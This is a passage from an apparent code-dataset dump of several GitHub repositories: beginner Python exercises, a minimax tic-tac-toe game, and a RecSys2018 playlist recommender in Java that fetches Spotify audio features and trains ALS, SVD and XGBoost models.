35.666666\r\nprint(x)\r\nx=int(x)\r\nprint(x)\r\nprint(int(0.67565))\r\ny=50\r\nprint(y)\r\nprint(float(y))\r\nprint(x*y)\r\nprint(int(x)*int(y))\r\ncomplex(553533645375378383)\r\nprint(687675675675645454564)\r\nint(575655656e+21+0j)\r\n" }, { "alpha_fraction": 0.6245847344398499, "alphanum_fraction": 0.6378737688064575, "avg_line_length": 28.100000381469727, "blob_id": "3af8b708336a8cadd85ff8aade6adc67c88ae5cb", "content_id": "92f13ddabf9e3d139542d0ad432ba85bbcff39d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 301, "license_type": "no_license", "max_line_length": 67, "num_lines": 10, "path": "/forloop.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "courseName = \"pyhton for begineers 2018\"\r\n\r\nfor letter in courseName:\r\n print(\"current letter is\",letter)\r\n if (letter == \" \"):\r\n print(\"this is space character\")\r\n\r\nbands = [\"journey\",\"reo speedwagon\",\"foreigner\",\"heart\",\"the cure\"]\r\nfor band in bands:\r\n print(\"current band:\",band)\r\n" }, { "alpha_fraction": 0.48672565817832947, "alphanum_fraction": 0.5420354008674622, "avg_line_length": 12.933333396911621, "blob_id": "fc0252c39c83e979ae2bda8dd1552740d0432232", "content_id": "d4c2c55adbd5a2c68d9782271e3734ceb3afc724", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 452, "license_type": "no_license", "max_line_length": 45, "num_lines": 30, "path": "/examples.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "print(5 - 6 *2)\r\nprint((5 - 6) * 2)\r\nprint(3 ** 3 * 5)\r\nprint ( 3 ** (3 * 5))\r\n\r\n#parenthesis\r\n#exponents\r\n#multiplication\r\n#division\r\n#addition\r\n#subtraction\r\n\r\n#while loop\r\nx=0\r\nwhile (x<25):\r\n print(\"the x is:\",x)\r\n x=x+1\r\n\r\ncounter = 100\r\nwhile(counter > 0):\r\n print(counter)\r\n counter = counter - 10\r\nelse:\r\n print(\"y is no longer greater than zero\")\r\n\r\n\r\n#y = 1\r\n#while (y>0):\r\n# print (y)\r\n# y = y + 1 indefinite loop\r\n\r\n\r\n" }, { "alpha_fraction": 0.6802507638931274, "alphanum_fraction": 0.7084639668464661, "avg_line_length": 29.299999237060547, "blob_id": "be3381f64b57f8e91f58fe9f5b91afe4a8a1a550", "content_id": "670ba80f2884dc08d313af1bceb28cbc78e485ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 319, "license_type": "no_license", "max_line_length": 115, "num_lines": 10, "path": "/random.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "import random\r\n\r\nnames = [\"fred\",\"mary\",\"thomas\",\"kevin\",\"mike\",\"june\"]\r\n\r\nprint(random.choice(names)) #picks out names randomly\r\n\r\nrandom.shuffle(names)#randomly shuffles in it.\r\nprint(names)\r\n\r\nprint(random.randrange(1,1000,10))#last value is step that a random should run for 10 steps to find a random number\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.5784753561019897, "alphanum_fraction": 0.6502242088317871, "avg_line_length": 15.916666984558105, "blob_id": "c09d568c94523c83ec89b600cee4a2792d894441", "content_id": "007a336696a835c8433ee6d0090d41fbfb433d7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 52, "num_lines": 12, "path": "/mathematical functions.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "import math\r\n\r\nvalue1 = 89.6\r\nvalue2 = 176\r\nprint(abs(value1 - value2))\r\n\r\nprint (math.ceil(value1)) #rounds to bigger number\r\n\r\nprint(math.floor(value1)) #rounds to smaller number\r\n\r\nprint(pow(3,4))\r\nprint(3**4)\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.5305466055870056, "alphanum_fraction": 0.5305466055870056, "avg_line_length": 19.785715103149414, "blob_id": "0c1a5afea1d5bb76bafab5aa39b7274e582f22ba", "content_id": "0e980de4e7cf07fa51c79b582de065cf4eb59315", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "no_license", "max_line_length": 43, "num_lines": 14, "path": "/break.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "statement = \"make hay while the sun shines\"\r\nfor x in statement:\r\n print(\"current letter\",x)\r\n if x == \"e\":\r\n break\r\n\r\nfor x in statement:\r\n if x == \"e\":\r\n break\r\n print(\"current letter\",x)\r\nfor x in statement:\r\n if x == \"w\":\r\n continue\r\n print(\"current letter\",x)\r\n \r\n" }, { "alpha_fraction": 0.3880368173122406, "alphanum_fraction": 0.44631901383399963, "avg_line_length": 27.636363983154297, "blob_id": "2a3bcf6e83278747b36e6f805080d1b5a7733db5", "content_id": "5ab3c557c41c914ac49d8dbfbbe72888d0670983", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 44, "num_lines": 22, "path": "/opentheparenthesis.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "a = 20\r\nb = 10\r\nc = 15\r\nd = 5\r\nprint (\"a:%d b:%d c:%d d:%d\" % (a,b,c,d ))\r\ne = (a + b) * c / d #( 30 * 15 ) / 5\r\nprint (\"Value of (a + b) * c / d is \", e)\r\ne = ((a + b) * c) / d # (30 * 15 ) / 5\r\nprint (\"Value of ((a + b) * c) / d is \", e)\r\ne = (a + b) * (c / d) # (30) * (15/5)\r\nprint (\"Value of (a + b) * (c / d) is \", e)\r\ne = a + (b * c) / d # 20 + (150/5)\r\nprint (\"Value of a + (b * c) / d is \", e)\r\namount=int(input(\"Enter amount: \"))\r\nif amount<1000:\r\n discount=amount*0.05\r\n print (\"Discount\",discount)\r\nelse:\r\n discount=amount*0.10\r\n print (\"Discount\",discount)\r\n \r\nprint (\"Net payable:\",amount-discount)\r\n" }, { "alpha_fraction": 0.5644115209579468, "alphanum_fraction": 0.5977756977081299, "avg_line_length": 20.020408630371094, "blob_id": "0c5c95d9150b9a56428fd4dd2196dbbe5086a573", "content_id": "762619da0c248775ae9d75fcf8d7e5bad4b458ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1079, "license_type": "no_license", "max_line_length": 62, "num_lines": 49, "path": "/prac.py", "repo_name": "Sumindar/Basic-python", "src_encoding": "UTF-8", "text": "# This program adds two numbers\r\n\r\nnum1 = 1.5\r\nnum2 = 6.3\r\n\r\n# Add two numbers\r\nsum = float(num1) + float(num2)\r\n\r\n# Display the sum\r\nprint('The sum of {0} and {1} is {2}'.format(num1, num2, sum))\r\n# Python Program to find the area of triangle\r\n\r\na = 5\r\nb = 6\r\nc = 7\r\n\r\n# Uncomment below to take inputs from the user\r\n# a = float(input('Enter first side: '))\r\n# b = float(input('Enter second side: '))\r\n# c = float(input('Enter third side: '))\r\n\r\n# calculate the semi-perimeter\r\ns = (a + b + c) / 2\r\n\r\n# calculate the area\r\narea = (s*(s-a)*(s-b)*(s-c)) ** 0.5\r\nprint('The area of the triangle is %0.2f' %area)\r\n# Solve the quadratic equation ax**2 + bx + c = 0\r\n\r\n# import complex math module\r\nimport cmath\r\n\r\na = 1\r\nb = 5\r\nc = 6\r\n\r\n# To take coefficient input from the users\r\n# a = float(input('Enter a: '))\r\n# b = float(input('Enter b: '))\r\n# c = float(input('Enter c: '))\r\n\r\n# calculate the discriminant\r\nd = (b**2) - (4*a*c)\r\n\r\n# find two solutions\r\nsol1 = (-b-cmath.sqrt(d))/(2*a)\r\nsol2 = (-b+cmath.sqrt(d))/(2*a)\r\n\r\nprint('The solution are {0} and {1}'.format(sol1,sol2))\r\n" } ]
12
yashmunjal1412/TicTacToe_Minimax
https://github.com/yashmunjal1412/TicTacToe_Minimax
c224b78926f76150044fa5592cba68f567ce2321
d8d42bce4265ebd95744976d0eb92226935d2a26
8028d574b66e1b7c8ee2e1796ee0dab22bb118d0
refs/heads/master
2022-11-29T17:05:06.818060
2020-08-15T12:38:44
2020-08-15T12:38:44
287,741,040
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.41917484998703003, "alphanum_fraction": 0.4467772841453552, "avg_line_length": 29.266666412353516, "blob_id": "f46b1c223749fb222380825cc1f6b05769d0ccbc", "content_id": "7ecb5021ea3c50df277dc9ec45daf557a9a6b2b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6811, "license_type": "no_license", "max_line_length": 331, "num_lines": 225, "path": "/TicTacToe_minimax.py", "repo_name": "yashmunjal1412/TicTacToe_Minimax", "src_encoding": "UTF-8", "text": "\nfrom math import inf as infinity\nfrom random import choice\nUSER = -1\nCPU = +1\nboard = [ [0, 0, 0],[0, 0, 0],[0, 0, 0],]\nmark = [ [0, 0, 0],[0, 0, 0],[0, 0, 0],] #Used to draw the board state\ndef title(): \n print(' _______________________________________________________________ ')\n print(\"| _____ _ ____ _____ ____ ____ _____ ____ _____ |\")\n print(\"| /__ __\\/ \\/ _\\ /__ __\\/ _ \\/ _\\ /__ __\\/ _ \\/ __/ |\") \n print(\"| / \\ | || / _____ / \\ | / \\|| / _____ / \\ | / \\|| \\ |\") \n print(\"| | | | || \\_\\____\\| | | |-||| \\_\\____\\| | | \\_/|| /_ |\") \n print(\"| \\_/ \\_/\\____/ \\_/ \\_/ \\|\\____/ \\_/ \\____/\\____\\ |\")\n print(\"| by YASH MUNJAL |\")\n print('|_______________________________________________________________|\\n')\n\ndef evaluate(board): #Evaluates the leaves of game tree\n\n if wins(board, CPU):\n score = +1\n elif wins(board, USER):\n score = -1\n else:\n score = 0\n\n return score\n\ndef game_end(board): # Checks whether user or cpu has won the game\n\n return wins(board, USER) or wins(board, CPU)\n\ndef empty_cells(board): #Returns list of empty cells\n cells = []\n\n for x, row in enumerate(board):\n for y, box in enumerate(row):\n if box == 0:\n cells.append([x, y])\n\n return cells\n\n\ndef valid(x, y): #Checks whether the move is valid or not\n if [x, y] in empty_cells(board):\n return True\n else:\n return False\n\n\ndef wins(board, player): # Checks whether the player(cpu or user) has won or not\n\n win_state = [\n [board[0][0], board[0][1], board[0][2]], [board[1][0], board[1][1], board[1][2]],[board[2][0], board[2][1], board[2][2]], [board[0][0], board[1][0], board[2][0]],[board[0][1], board[1][1], board[2][1]],[board[0][2], board[1][2], board[2][2]], [board[0][0], board[1][1], board[2][2]],[board[2][0], board[1][1], board[0][2]],\n ]\n if [player, player, player] in win_state:\n return True\n else:\n return False\n\ndef set_marker(x, y, player): # Sets the marker at a cell\n\n if valid(x, y):\n board[x][y] = player\n return True\n else:\n return False\n\n\ndef minimax(board, depth, player): # MINIMAX function to obtain optimal move\n\n if player == CPU:\n move = [-1, -1, -infinity]\n else:\n move = [-1, -1, +infinity]\n\n if depth == 0 or game_end(board):\n score = evaluate(board)\n return [-1, -1, score]\n\n for box in empty_cells(board):\n x, y = box[0], box[1]\n board[x][y] = player\n score = minimax(board, depth - 1, -player)\n board[x][y] = 0\n score[0], score[1] = x, y\n\n if player == CPU:\n if score[2] > move[2]:\n move = score # max value\n else:\n if score[2] < move[2]:\n move = score # min value\n\n return move\n\ndef draw_board(board, cpu_marker, user_marker): #Draws the current state of game board\n\n for x in [0,1,2]:\n for y in [0,1,2]:\n if board[x][y]==-1:\n mark[x][y]=user_marker\n elif board[x][y]==1:\n mark[x][y]=cpu_marker\n elif board[x][y]==0:\n mark[x][y]=' '\n\n print()\n print(' reference:')\n print(' | | ',10*' ',' | | ',)\n print(' '+mark[0][0]+' | '+mark[0][1]+' | '+mark[0][2]+' ',10*' ',' 1 | 2 | 3 ')\n print('-----+----+-----',10*' ',\"-----+----+-----\")\n print(' | | ',10*' ',\" | | \")\n print(' '+mark[1][0]+' | '+mark[1][1]+' | '+mark[1][2]+' ',10*' ',\" 4 | 5 | 6 \")\n print('-----+----+-----',10*' ',\"-----+----+-----\")\n print(' | | ',10*' ',\" | | \")\n print(' '+mark[2][0]+' | '+mark[2][1]+' | '+mark[2][2]+' ',10*' ',\" 7 | 8 | 9 \\n\\n\")\n\ndef cpu_chance(cpu_marker, user_marker): # Calls minimax to obtain cpu's move\n\n depth = len(empty_cells(board))\n if depth == 0 or game_end(board):\n return\n\n print('Cpu turn')\n draw_board(board, cpu_marker, user_marker)\n\n if depth == 9:\n x = choice([0, 1, 2])\n y = choice([0, 1, 2])\n else:\n move = minimax(board, depth, CPU)\n x, y = move[0], move[1]\n\n set_marker(x, y, CPU)\n\n\ndef user_chance(cpu_marker, user_marker): # Ask's user for the positon to place marker\n\n depth = len(empty_cells(board))\n if depth == 0 or game_end(board):\n return\n\n move = -1\n moves = {\n 1: [0, 0], 2: [0, 1], 3: [0, 2],\n 4: [1, 0], 5: [1, 1], 6: [1, 2],\n 7: [2, 0], 8: [2, 1], 9: [2, 2],\n }\n\n print('User turn')\n draw_board(board, cpu_marker, user_marker)\n\n while move < 1 or move > 9:\n try:\n move = int(input('Enter the position to place your marker(1-9): '))\n coord = moves[move]\n can_move = set_marker(coord[0], coord[1], USER)\n\n if not can_move:\n print('Already Occupied')\n move = -1\n except (KeyError, ValueError):\n print('Bad choice')\n\n\ndef main(): #Main Function\n title()\n user_marker = '' # X or O\n cpu_marker = '' # X or O\n first = '' # if human is the first\n\n # User chooses X or O to play\n while user_marker != 'O' and user_marker != 'X':\n try:\n print('')\n user_marker = input('Choose a marker to play (X or O)\\nChosen: ').upper()\n except (KeyError, ValueError):\n print('Choose a valid marker!')\n\n # cpu's marker\n if user_marker == 'X':\n cpu_marker = 'O'\n else:\n cpu_marker = 'X'\n\n # User chance\n while first != 'Y' and first != 'N':\n try:\n first = input('First to start?[y/n]: ').upper()\n except (KeyError, ValueError):\n print('Bad choice')\n\n # Main loop \n while len(empty_cells(board)) > 0 and not game_end(board):\n if first == 'N':\n cpu_chance(cpu_marker, user_marker)\n first = ''\n\n user_chance(cpu_marker, user_marker)\n cpu_chance(cpu_marker, user_marker)\n\n # Game over\n if wins(board, USER):\n print('User turn')\n draw_board(board, cpu_marker, user_marker)\n print('USER WINS!')\n elif wins(board, CPU):\n print('Cpu turn')\n draw_board(board, cpu_marker, user_marker)\n print('CPU WINS!')\n else:\n draw_board(board, cpu_marker, user_marker)\n print('DRAW!')\n \n while True:\n restart = input('Do you want to play again?(y/n): ').upper()\n if restart=='Y':\n main()\n elif restart=='N':\n print('Nice playing with you ! Bbye !')\n exit() \n\n\nif __name__ == '__main__':\n main()\n" } ]
1
internetmusic/RecSys2018
https://github.com/internetmusic/RecSys2018
8351cbf7ed5de536e41b8d53cf7ba4ce0c014316
80d2b77a33758ed55c5ba8ab7eb1de305e0978a7
59f6af2d58c5867abae4bb51ebe92ba58f19317f
refs/heads/master
2022-12-01T03:09:55.052493
2020-08-15T23:46:39
2020-08-15T23:46:39
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6349353194236755, "alphanum_fraction": 0.6414048075675964, "avg_line_length": 22.521739959716797, "blob_id": "264bfb8cea98715f9d19695cb1bed24fff473a49", "content_id": "157cb28de0780f84c41486c95c750db07e498042", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1082, "license_type": "permissive", "max_line_length": 65, "num_lines": 46, "path": "/src/main/java/common/MLRandomUtils.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package common;\n\nimport java.util.Random;\n\npublic class MLRandomUtils {\n\n\tpublic static float nextFloat(final float min, final float max,\n\t\t\tfinal Random rng) {\n\t\treturn min + rng.nextFloat() * (max - min);\n\t}\n\n\tpublic static void shuffle(int[] array, final Random rng) {\n\t\tfor (int i = array.length - 1; i > 0; i--) {\n\t\t\tint index = rng.nextInt(i + 1);\n\t\t\t// swap\n\t\t\tint element = array[index];\n\t\t\tarray[index] = array[i];\n\t\t\tarray[i] = element;\n\t\t}\n\t}\n\n\tpublic static void shuffle(Object[] array, int startInclusive,\n\t\t\tint endExclusive, final Random rng) {\n\t\tfinal int len = endExclusive - startInclusive;\n\n\t\tfor (int j = len - 1; j > 0; j--) {\n\t\t\tint index = rng.nextInt(j + 1) + startInclusive;\n\t\t\tint i = j + startInclusive;\n\t\t\t// swap\n\t\t\tObject element = array[index];\n\t\t\tarray[index] = array[i];\n\t\t\tarray[i] = element;\n\t\t}\n\t}\n\n\tpublic static void shuffle(Object[] array, final Random rng) {\n\t\tshuffle(array, 0, array.length, rng);\n\t}\n\n\tpublic static int[] shuffleCopy(int[] array, final Random rng) {\n\n\t\tint[] copy = array.clone();\n\t\tshuffle(copy, rng);\n\t\treturn copy;\n\t}\n}\n" }, { "alpha_fraction": 0.7052208781242371, "alphanum_fraction": 0.7204819321632385, "avg_line_length": 21.23214340209961, "blob_id": "5d3c604944c583875ed6a074cb334c632f31fcea", "content_id": "44f3fd40e9334db587d97196c631b7d0193e7a5e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1245, "license_type": "permissive", "max_line_length": 67, "num_lines": 56, "path": "/src/main/java/main/Song.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package main;\n\nimport net.minidev.json.JSONObject;\n\nimport java.io.Serializable;\n\npublic class Song implements Serializable {\n\n\tprivate static final long serialVersionUID = 6265625137029257218L;\n\tprivate String artist_name;\n\tprivate String track_uri;\n\tprivate String artist_uri;\n\tprivate String track_name;\n\tprivate String album_uri;\n\tprivate int duration_ms;\n\tprivate String album_name;\n\n\tpublic Song(final JSONObject obj) {\n\t\tthis.artist_name = obj.getAsString(\"artist_name\");\n\t\tthis.track_uri = obj.getAsString(\"track_uri\");\n\t\tthis.artist_uri = obj.getAsString(\"artist_uri\");\n\t\tthis.track_name = obj.getAsString(\"track_name\");\n\t\tthis.album_uri = obj.getAsString(\"album_uri\");\n\t\tthis.duration_ms = obj.getAsNumber(\"duration_ms\").intValue();\n\t\tthis.album_name = obj.getAsString(\"album_name\");\n\t}\n\n\tpublic String get_artist_name() {\n\t\treturn this.artist_name;\n\t}\n\n\tpublic String get_track_uri() {\n\t\treturn this.track_uri;\n\t}\n\n\tpublic String get_artist_uri() {\n\t\treturn this.artist_uri;\n\t}\n\n\tpublic String get_track_name() {\n\t\treturn this.track_name;\n\t}\n\n\tpublic String get_album_uri() {\n\t\treturn this.album_uri;\n\t}\n\n\tpublic int get_duration_ms() {\n\t\treturn this.duration_ms;\n\t}\n\n\tpublic String get_album_name() {\n\t\treturn this.album_name;\n\t}\n\n}\n" }, { "alpha_fraction": 0.6537505984306335, "alphanum_fraction": 0.6673290133476257, "avg_line_length": 28.896039962768555, "blob_id": "06163852c2b2af57e499244c2c43f7c49783a88b", "content_id": "f1d8ff0b7214545889f5b9f8df88bb45a486ab96", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 6039, "license_type": "permissive", "max_line_length": 105, "num_lines": 202, "path": "/src/main/java/main/Executor.java", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "package main;\n\nimport java.io.BufferedWriter;\nimport java.io.File;\nimport java.io.FileWriter;\nimport java.io.IOException;\n\nimport common.ALS;\nimport common.ALS.ALSParams;\nimport common.MLTimer;\nimport common.SplitterCF;\nimport main.XGBModel.XGBModelParams;\nimport okhttp3.OkHttpClient;\nimport okhttp3.Request;\nimport okhttp3.Response;\n\npublic class Executor {\n\n\tprivate static void downloadCreativeData(Data dataLoaded, String outFile,\n\t\t\tString authToken) throws IOException {\n\t\t// Please provide your own key here\n\t\tfinal String AUTH_TOKEN = \"Bearer \" + authToken;\n\n\t\ttry (BufferedWriter bw = new BufferedWriter(new FileWriter(outFile))) {\n\n\t\t\tint nSongs = dataLoaded.songs.length;\n\t\t\tint batchSize = Math.floorDiv(nSongs, 100);\n\t\t\tOkHttpClient client = new OkHttpClient();\n\n\t\t\tfor (int batch = 0; batch < batchSize; batch++) {\n\n\t\t\t\t// uncomment and provide batch number from where to begin in\n\t\t\t\t// case the operation was terminated due to auth expiration\n\t\t\t\t/*\n\t\t\t\t * if(batch <33207) continue;\n\t\t\t\t */\n\n\t\t\t\tSystem.out.println(\"Doing batch \" + batch);\n\n\t\t\t\tint batchStart = batch * 100;\n\t\t\t\tint batchEnd = Math.min(batchStart + 100, nSongs);\n\t\t\t\t// Now form a batch of 100\n\t\t\t\tString url = \"https://api.spotify.com/v1/audio-features?ids=\";\n\t\t\t\tint firstTime = 1;\n\t\t\t\tfor (int i = batchStart; i < batchEnd; i++) {\n\t\t\t\t\tif (firstTime == 1) {\n\t\t\t\t\t\turl = url + dataLoaded.songs[i].get_track_uri()\n\t\t\t\t\t\t\t\t.split(\":\")[2];\n\t\t\t\t\t\tfirstTime = 0;\n\t\t\t\t\t} else {\n\t\t\t\t\t\turl = url + \"%2C\" + dataLoaded.songs[i].get_track_uri()\n\t\t\t\t\t\t\t\t.split(\":\")[2];\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t\tRequest request = new Request.Builder().url(url)\n\t\t\t\t\t\t.addHeader(\"Authorization\", AUTH_TOKEN).build();\n\t\t\t\tResponse responses = null;\n\t\t\t\tString append = \"[\";\n\t\t\t\tString last = \"]\";\n\n\t\t\t\ttry {\n\t\t\t\t\tresponses = client.newCall(request).execute();\n\t\t\t\t} catch (IOException e) {\n\t\t\t\t\te.printStackTrace();\n\t\t\t\t}\n\t\t\t\tString jsonData = responses.body().string();\n\t\t\t\tjsonData = append + jsonData + last;\n\t\t\t\torg.json.JSONArray jsonarray = new org.json.JSONArray(jsonData);\n\n\t\t\t\tif (jsonarray.getJSONObject(0).has(\"error\")) {\n\t\t\t\t\tSystem.out.println(\"timed out pausing for a while.\");\n\t\t\t\t\ttry {\n\t\t\t\t\t\tThread.sleep(4000 + 1000);\n\n\t\t\t\t\t\ttry {\n\t\t\t\t\t\t\tresponses = client.newCall(request).execute();\n\t\t\t\t\t\t} catch (IOException e) {\n\t\t\t\t\t\t\te.printStackTrace();\n\t\t\t\t\t\t}\n\t\t\t\t\t\tjsonData = responses.body().string();\n\t\t\t\t\t\tjsonData = append + jsonData + last;\n\t\t\t\t\t\tjsonarray = new org.json.JSONArray(jsonData);\n\t\t\t\t\t} catch (InterruptedException e) {\n\t\t\t\t\t\te.printStackTrace();\n\t\t\t\t\t}\n\n\t\t\t\t}\n\t\t\t\tif (jsonarray.getJSONObject(0).has(\"error\")) {\n\t\t\t\t\tSystem.out.println(jsonarray.getJSONObject(0));\n\t\t\t\t\t// Now our key has timed out . SO lets just exit\n\t\t\t\t\tbw.close();\n\t\t\t\t\tSystem.out.println(\n\t\t\t\t\t\t\t\"Please refresh your key as you timed out on batch: \"\n\t\t\t\t\t\t\t\t\t+ batch);\n\t\t\t\t\tSystem.exit(1);\n\t\t\t\t}\n\n\t\t\t\torg.json.JSONArray jsonobject = (org.json.JSONArray) jsonarray\n\t\t\t\t\t\t.getJSONObject(0).get(\"audio_features\");\n\t\t\t\tString writeString = jsonobject.toString();\n\t\t\t\tif (batch == 0) {\n\t\t\t\t\twriteString = writeString.replace(\"]\", \",\");\n\t\t\t\t} else if (batch == batchSize - 1) {\n\t\t\t\t\twriteString = writeString.replace(\"[\", \"\");\n\t\t\t\t} else {\n\t\t\t\t\twriteString = writeString.replace(\"[\", \"\");\n\t\t\t\t\twriteString = writeString.replace(\"]\", \",\");\n\t\t\t\t}\n\t\t\t\tbw.write(writeString);\n\n\t\t\t}\n\t\t\tbw.close();\n\n\t\t} catch (IOException e) {\n\n\t\t\te.printStackTrace();\n\n\t\t}\n\t\tSystem.out.println(\"Extraction complete.\");\n\t}\n\n\tpublic static void main(final String[] args) {\n\t\ttry {\n\t\t\tString authToken = \"\";\n\t\t\tString creativeTrackFile = \"/media/mvolkovs/external4TB/Data/recsys2018/data/song_audio_features.txt\";\n\n\t\t\tString trainPath = \"/media/mvolkovs/external4TB/Data/recsys2018/data/train\";\n\t\t\tString testFile = \"/media/mvolkovs/external4TB/Data/recsys2018/data/test/challenge_set.json\";\n\t\t\tString pythonScriptPath = \"/home/mvolkovs/projects/vl6_recsys2018/script/svd_py.py\";\n\t\t\tString cachePath = \"/media/mvolkovs/external4TB/Data/recsys2018/models/svd/\";\n\n\t\t\tMLTimer timer = new MLTimer(\"main\");\n\t\t\ttimer.tic();\n\n\t\t\tXGBModelParams xgbParams = new XGBModelParams();\n\t\t\txgbParams.doCreative = false;\n\t\t\txgbParams.xgbModel = cachePath + \"xgb.model\";\n\n\t\t\t// load data\n\t\t\tData data = DataLoader.load(trainPath, testFile);\n\t\t\ttimer.toc(\"data loaded\");\n\n\t\t\t// download creative track features if not there\n\t\t\tif (xgbParams.doCreative == true\n\t\t\t\t\t&& new File(creativeTrackFile).exists() == false) {\n\t\t\t\tdownloadCreativeData(data, creativeTrackFile, authToken);\n\t\t\t}\n\n\t\t\tParsedDataLoader loader = new ParsedDataLoader(data);\n\t\t\tloader.loadPlaylists();\n\t\t\tloader.loadSongs();\n\t\t\tif (xgbParams.doCreative == true) {\n\t\t\t\tloader.loadSongExtraInfo(creativeTrackFile);\n\t\t\t}\n\t\t\tParsedData dataParsed = loader.dataParsed;\n\t\t\ttimer.toc(\"data parsed\");\n\n\t\t\t// generate split\n\t\t\tSplitterCF split = RecSysSplitter.getSplitMatching(dataParsed);\n\t\t\tRecSysSplitter.removeName(dataParsed, split);\n\t\t\ttimer.toc(\"split done\");\n\n\t\t\t// get all latents\n\t\t\tLatents latents = new Latents();\n\n\t\t\t// WMF\n\t\t\tALSParams alsParams = new ALSParams();\n\t\t\talsParams.alpha = 100;\n\t\t\talsParams.rank = 200;\n\t\t\talsParams.lambda = 0.001f;\n\t\t\talsParams.maxIter = 10;\n\t\t\tALS als = new ALS(alsParams);\n\t\t\tals.optimize(split.getRstrain().get(ParsedData.INTERACTION_KEY),\n\t\t\t\t\tnull);\n\t\t\tlatents.U = als.getU();\n\t\t\tlatents.Ucnn = als.getU();\n\t\t\tlatents.V = als.getV();\n\t\t\tlatents.Vcnn = als.getV();\n\n\t\t\t// SVD on album, artist and name\n\t\t\tSVDModel svdModel = new SVDModel(dataParsed, split, latents);\n\t\t\tsvdModel.factorizeAlbums(pythonScriptPath, cachePath);\n\t\t\tsvdModel.factorizeArtists(pythonScriptPath, cachePath);\n\t\t\tsvdModel.factorizeNames(pythonScriptPath, cachePath);\n\t\t\ttimer.toc(\"latents computed\");\n\n\t\t\t// train second stage model\n\t\t\t// Latents latents = new Latents(dataParsed);\n\t\t\tXGBModel model = new XGBModel(dataParsed, xgbParams, latents,\n\t\t\t\t\tsplit);\n\t\t\tmodel.extractFeatures2Stage(cachePath);\n\t\t\tmodel.trainModel(cachePath);\n\t\t\tmodel.submission2Stage(cachePath + \"submission.out\");\n\n\t\t} catch (Exception e) {\n\t\t\te.printStackTrace();\n\t\t}\n\n\t}\n}\n" }, { "alpha_fraction": 0.623941957950592, "alphanum_fraction": 0.6303909420967102, "avg_line_length": 32.52702713012695, "blob_id": "ba65b71607183487d3f6451e8709eb7355a6b62a", "content_id": "5cce4b9e3c806edcd37d3a03acd18fca7b6c5c92", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2481, "license_type": "permissive", "max_line_length": 130, "num_lines": 74, "path": "/script/svd_py.py", "repo_name": "internetmusic/RecSys2018", "src_encoding": "UTF-8", "text": "import argparse\nfrom scipy.sparse import *\nimport numpy as np\nfrom sklearn.utils.extmath import randomized_svd\n\n# Note: This file is for Java command call only, not part of this package at all.\n\ndef check_int_positive(value):\n ivalue = int(value)\n if ivalue < 0:\n raise argparse.ArgumentTypeError(\"%s is an invalid positive int value\" % value)\n return ivalue\n\n\ndef check_float_positive(value):\n ivalue = float(value)\n if ivalue <= 0:\n raise argparse.ArgumentTypeError(\"%s is an invalid positive float value\" % value)\n return ivalue\n\ndef shape(s):\n try:\n num = int(s)\n return num\n except:\n raise argparse.ArgumentTypeError(\"Sparse matrix shape must be integer\")\n\n\ndef load_csv(path, name, shape):\n data = np.genfromtxt(path + name, delimiter=',')\n matrix = csr_matrix((data[:, 2], (data[:, 0].astype('int32'), data[:, 1].astype('int32'))), shape=shape)\n return matrix\n\ndef save_np(matrix, path, name):\n np.savetxt(path + name, matrix, delimiter=',', fmt='%.5f')\n\ndef main(args):\n print(\"Reading CSV\")\n matrix_input = load_csv(path=args.path, name=args.train, shape=args.shape)\n print(\"Perform SVD\")\n P, sigma, Qt = randomized_svd(matrix_input,\n n_components=args.rank,\n n_iter=args.iter,\n\t\t\t\t power_iteration_normalizer='LU',\n random_state=1)\n\n PtimesS = np.matmul(P, np.diag(sigma))\n print \"computed P*S\"\n\n #Pt = P.T\n save_np(PtimesS, args.path, args.user)\n print \"saved P*S\"\n\n save_np(Qt.T, args.path, args.item)\n print \"saved Q\"\n\n save_np(sigma, args.path, args.sigm)\n print \"saved s\"\n\n\nif __name__ == \"__main__\":\n # Commandline arguments\n parser = argparse.ArgumentParser(description=\"SVD\")\n parser.add_argument('-i', dest='iter', type=check_int_positive, default=4)\n parser.add_argument('-r', dest='rank', type=check_int_positive, default=100)\n parser.add_argument('-d', dest='path', default=\"/media/wuga/Storage/python_project/wlrec/IMPLEMENTATION_Projected_LRec/data/\")\n parser.add_argument('-f', dest='train', default='matrix.csv')\n parser.add_argument('-u', dest='user', default='U.nd')\n parser.add_argument('-v', dest='item', default='V.nd')\n parser.add_argument('-s', dest='sigm', default='S.nd')\n parser.add_argument('--shape', help=\"CSR Shape\", dest=\"shape\", type=shape, nargs=2)\n args = parser.parse_args()\n\n 